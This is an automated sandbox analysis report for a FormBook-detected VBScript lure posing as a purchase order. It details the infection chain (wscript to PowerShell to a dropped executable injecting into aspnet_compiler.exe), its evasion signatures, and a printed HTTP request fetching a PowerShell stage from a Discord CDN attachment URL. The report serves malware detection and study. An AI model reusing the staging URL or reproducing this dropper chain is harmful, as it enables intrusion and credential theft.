Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
PO_11171111221.Vbs.vbs

Overview

General Information

Sample name:PO_11171111221.Vbs.vbs
Analysis ID:1574269
MD5:3b3169de8bdf739bd63c74c42a338033
SHA1:a5c91d1b08ca5c668f03a1af2ae82ca8a792b47b
SHA256:b35d6e6054b695ac319bf4ddee0754ca6391be5c032aa7f448a2dfb9a45b4e33
Tags:vbsuser-abuse_ch
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
VBScript performs obfuscated calls to suspicious functions
Yara detected FormBook
.NET source code contains very large array initializations
AI detected suspicious sample
Allocates memory in foreign processes
Found suspicious powershell code related to unpacking or dynamic code loading
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Powershell drops PE file
Sigma detected: Script Initiated Connection to Non-Local Network
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: AspNetCompiler Execution
Sigma detected: Script Initiated Connection
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • wscript.exe (PID: 416 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PO_11171111221.Vbs.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 1216 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\dddddd.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 1148 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • x.exe (PID: 4408 cmdline: "C:\Users\user\AppData\Local\Temp\x.exe" MD5: 3A4DEEB8FD959AF313C23032D971093E)
        • aspnet_compiler.exe (PID: 2800 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe" MD5: FDA8C8F2A4E100AFB14C13DFCBCAB2D2)
        • aspnet_compiler.exe (PID: 2472 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe" MD5: FDA8C8F2A4E100AFB14C13DFCBCAB2D2)
      • conhost.exe (PID: 4408 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
00000005.00000002.1996937641.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000005.00000002.1997479679.0000000000BA0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      Process Memory Space: powershell.exe PID: 1216INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
      • 0x28696:$b1: ::WriteAllBytes(
      • 0x2786a6:$b1: ::WriteAllBytes(
      • 0x286b2:$b2: ::FromBase64String(
      • 0x2786c2:$b2: ::FromBase64String(
      • 0x112f0c:$s1: -join
      • 0x11ffe1:$s1: -join
      • 0x1233b3:$s1: -join
      • 0x123a65:$s1: -join
      • 0x125556:$s1: -join
      • 0x12775c:$s1: -join
      • 0x127f83:$s1: -join
      • 0x1287f3:$s1: -join
      • 0x128f2e:$s1: -join
      • 0x128f60:$s1: -join
      • 0x128fa8:$s1: -join
      • 0x128fc7:$s1: -join
      • 0x129817:$s1: -join
      • 0x129993:$s1: -join
      • 0x129a0b:$s1: -join
      • 0x129a9e:$s1: -join
      • 0x129d04:$s1: -join
      SourceRuleDescriptionAuthorStrings
      5.2.aspnet_compiler.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        5.2.aspnet_compiler.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security

          System Summary

          barindex
          Source: Network ConnectionAuthor: frack113, Florian Roth: Data: DestinationIp: 162.159.129.233, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 416, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49730
          Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PO_11171111221.Vbs.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PO_11171111221.Vbs.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PO_11171111221.Vbs.vbs", ProcessId: 416, ProcessName: wscript.exe
          Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe", CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\x.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\x.exe, ParentProcessId: 4408, ParentProcessName: x.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe", ProcessId: 2800, ProcessName: aspnet_compiler.exe
          Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 162.159.129.233, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 416, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49730
          Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PO_11171111221.Vbs.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PO_11171111221.Vbs.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PO_11171111221.Vbs.vbs", ProcessId: 416, ProcessName: wscript.exe
          Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\dddddd.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\dddddd.ps1", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PO_11171111221.Vbs.vbs", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 416, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\dddddd.ps1", ProcessId: 1216, ProcessName: powershell.exe
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-12-13T07:51:05.600488+010020188561A Network Trojan was detected162.159.129.233443192.168.2.449730TCP

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Source: C:\Users\user\AppData\Local\Temp\x.exeAvira: detection malicious, Label: TR/Dropper.Gen
          Source: PO_11171111221.Vbs.vbsVirustotal: Detection: 14%Perma Link
          Source: Yara matchFile source: 5.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000005.00000002.1996937641.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.1997479679.0000000000BA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
          Source: C:\Users\user\AppData\Local\Temp\x.exeJoe Sandbox ML: detected
          Source: unknownHTTPS traffic detected: 162.159.129.233:443 -> 192.168.2.4:49730 version: TLS 1.2
          Source: Binary string: wntdll.pdbUGP source: aspnet_compiler.exe, 00000005.00000002.1998243490.0000000001050000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: aspnet_compiler.exe, aspnet_compiler.exe, 00000005.00000002.1998243490.0000000001050000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: VXCVNXC233.pdb source: powershell.exe, 00000001.00000002.1763331017.000001EFD100D000.00000004.00000800.00020000.00000000.sdmp, x.exe.1.dr

          Software Vulnerabilities

          barindex
          Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

          Networking

          barindex
          Source: Network trafficSuricata IDS: 2018856 - Severity 1 - ET MALWARE Windows executable base64 encoded : 162.159.129.233:443 -> 192.168.2.4:49730
          Source: C:\Windows\System32\wscript.exeNetwork Connect: 162.159.129.233 443Jump to behavior
          Source: Joe Sandbox ViewIP Address: 162.159.129.233 162.159.129.233
          Source: Joe Sandbox ViewIP Address: 162.159.129.233 162.159.129.233
          Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
          Source: global trafficHTTP traffic detected: GET /attachments/1295304757166080020/1316923696224669696/fore.ps1?ex=675cd044&is=675b7ec4&hm=5608089203d1f55754eb42ae1b19e52da07e426935e063abf1f2bb096cfc394e& HTTP/1.1Accept: */*Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: cdn.discordapp.comConnection: Keep-Alive
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: global trafficHTTP traffic detected: GET /attachments/1295304757166080020/1316923696224669696/fore.ps1?ex=675cd044&is=675b7ec4&hm=5608089203d1f55754eb42ae1b19e52da07e426935e063abf1f2bb096cfc394e& HTTP/1.1Accept: */*Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: cdn.discordapp.comConnection: Keep-Alive
          Source: global trafficDNS traffic detected: DNS query: cdn.discordapp.com
          Source: powershell.exe, 00000001.00000002.1763331017.000001EFD100D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1728136588.000001EFC26FC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
          Source: powershell.exe, 00000001.00000002.1728136588.000001EFC2583000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
          Source: powershell.exe, 00000001.00000002.1728136588.000001EFC0F91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: powershell.exe, 00000001.00000002.1728136588.000001EFC2197000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: powershell.exe, 00000001.00000002.1728136588.000001EFC2583000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
          Source: powershell.exe, 00000001.00000002.1728136588.000001EFC0F91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
          Source: wscript.exe, 00000000.00000003.1785984248.00000163D4375000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.discordapp.com/
          Source: wscript.exe, 00000000.00000002.1789139746.00000163D4455000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.discordapp.com/attac
          Source: wscript.exe, 00000000.00000003.1708120120.00000163D6330000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/129530475716608
          Source: wscript.exe, wscript.exe, 00000000.00000003.1708120120.00000163D6330000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1789200260.00000163D6120000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1707617251.00000163D6124000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1707941021.00000163D6124000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/1295304757166080020/1316923696
          Source: wscript.exe, 00000000.00000002.1789200260.00000163D6122000.00000004.00000020.00020000.00000000.sdmp, PO_11171111221.Vbs.vbsString found in binary or memory: https://cdn.discordapp.com/attachments/1295304757166080020/1316923696224669696/fore.ps1?ex=675cd044&
          Source: powershell.exe, 00000001.00000002.1728136588.000001EFC26FC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
          Source: powershell.exe, 00000001.00000002.1728136588.000001EFC26FC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
          Source: powershell.exe, 00000001.00000002.1728136588.000001EFC26FC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
          Source: powershell.exe, 00000001.00000002.1728136588.000001EFC2583000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
          Source: wscript.exe, 00000000.00000003.1785872374.00000163D4371000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1789113895.00000163D4378000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1785984248.00000163D4375000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
          Source: powershell.exe, 00000001.00000002.1763331017.000001EFD100D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1728136588.000001EFC26FC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
          Source: powershell.exe, 00000001.00000002.1728136588.000001EFC2197000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.org
          Source: powershell.exe, 00000001.00000002.1728136588.000001EFC2197000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.orgX
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
          Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
          Source: unknownHTTPS traffic detected: 162.159.129.233:443 -> 192.168.2.4:49730 version: TLS 1.2

          E-Banking Fraud

          barindex
          Source: Yara matchFile source: 5.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000005.00000002.1996937641.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.1997479679.0000000000BA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

          System Summary

          barindex
          Source: Process Memory Space: powershell.exe PID: 1216, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
          Source: x.exe.1.dr, -Module-.csLarge array initialization: _003CModule_003E: array initializer size 74016
          Source: 1.2.powershell.exe.1efd11c4300.0.raw.unpack, -Module-.csLarge array initialization: _003CModule_003E: array initializer size 74016
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\x.exeJump to dropped file
          Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
          Source: C:\Windows\System32\wscript.exeCOM Object queried: XML HTTP HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F6D90F16-9C73-11D3-B32E-00C04F990BB4}Jump to behavior
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\dddddd.ps1"
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\dddddd.ps1"Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_0042CAA3 NtClose,5_2_0042CAA3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010C35C0 NtCreateMutant,LdrInitializeThunk,5_2_010C35C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010C2B60 NtClose,LdrInitializeThunk,5_2_010C2B60
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010C2DF0 NtQuerySystemInformation,LdrInitializeThunk,5_2_010C2DF0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010C2C70 NtFreeVirtualMemory,LdrInitializeThunk,5_2_010C2C70
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010C3010 NtOpenDirectoryObject,5_2_010C3010
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010C3090 NtSetValueKey,5_2_010C3090
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010C4340 NtSetContextThread,5_2_010C4340
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010C4650 NtSuspendThread,5_2_010C4650
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010C39B0 NtGetContextThread,5_2_010C39B0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010C2B80 NtQueryInformationFile,5_2_010C2B80
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010C2BA0 NtEnumerateValueKey,5_2_010C2BA0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010C2BE0 NtQueryValueKey,5_2_010C2BE0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010C2BF0 NtAllocateVirtualMemory,5_2_010C2BF0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010C2AB0 NtWaitForSingleObject,5_2_010C2AB0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010C2AD0 NtReadFile,5_2_010C2AD0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010C2AF0 NtWriteFile,5_2_010C2AF0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010C2D00 NtSetInformationFile,5_2_010C2D00
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010C3D10 NtOpenProcessToken,5_2_010C3D10
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010C2D10 NtMapViewOfSection,5_2_010C2D10
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010C2D30 NtUnmapViewOfSection,5_2_010C2D30
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010C3D70 NtOpenThread,5_2_010C3D70
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010C2DB0 NtEnumerateKey,5_2_010C2DB0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010C2DD0 NtDelayExecution,5_2_010C2DD0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010C2C00 NtQueryInformationProcess,5_2_010C2C00
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010C2C60 NtCreateKey,5_2_010C2C60
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010C2CA0 NtQueryInformationToken,5_2_010C2CA0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010C2CC0 NtQueryVirtualMemory,5_2_010C2CC0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010C2CF0 NtOpenProcess,5_2_010C2CF0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010C2F30 NtCreateSection,5_2_010C2F30
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010C2F60 NtCreateProcessEx,5_2_010C2F60
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010C2F90 NtProtectVirtualMemory,5_2_010C2F90
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010C2FA0 NtQuerySection,5_2_010C2FA0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010C2FB0 NtResumeThread,5_2_010C2FB0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010C2FE0 NtCreateFile,5_2_010C2FE0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010C2E30 NtWriteVirtualMemory,5_2_010C2E30
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010C2E80 NtReadVirtualMemory,5_2_010C2E80
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010C2EA0 NtAdjustPrivilegesToken,5_2_010C2EA0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010C2EE0 NtQueueApcThread,5_2_010C2EE0
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_00FA08483_2_00FA0848
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_00FA1DD03_2_00FA1DD0
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_00FA07B83_2_00FA07B8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_0042F0C35_2_0042F0C3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_0041010A5_2_0041010A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_004101135_2_00410113
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_004011F05_2_004011F0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_00416B435_2_00416B43
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_0040E3135_2_0040E313
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_00402B1F5_2_00402B1F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_00402B205_2_00402B20
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_004103335_2_00410333
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_00416B3E5_2_00416B3E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_0040E4575_2_0040E457
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_0040E4635_2_0040E463
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_0040E4AC5_2_0040E4AC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_004026C05_2_004026C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_00402FE05_2_00402FE0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010801005_2_01080100
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_0112A1185_2_0112A118
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010C516C5_2_010C516C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_0107F1725_2_0107F172
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_0115B16B5_2_0115B16B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_0109B1B05_2_0109B1B0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_011501AA5_2_011501AA
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_011481CC5_2_011481CC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010970C05_2_010970C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_0113F0CC5_2_0113F0CC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_0114F0E05_2_0114F0E0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_011470E95_2_011470E9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_0114132D5_2_0114132D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_0114A3525_2_0114A352
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_0107D34C5_2_0107D34C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010D739A5_2_010D739A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_011503E65_2_011503E6
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_0109E3F05_2_0109E3F0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_011302745_2_01130274
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010952A05_2_010952A0
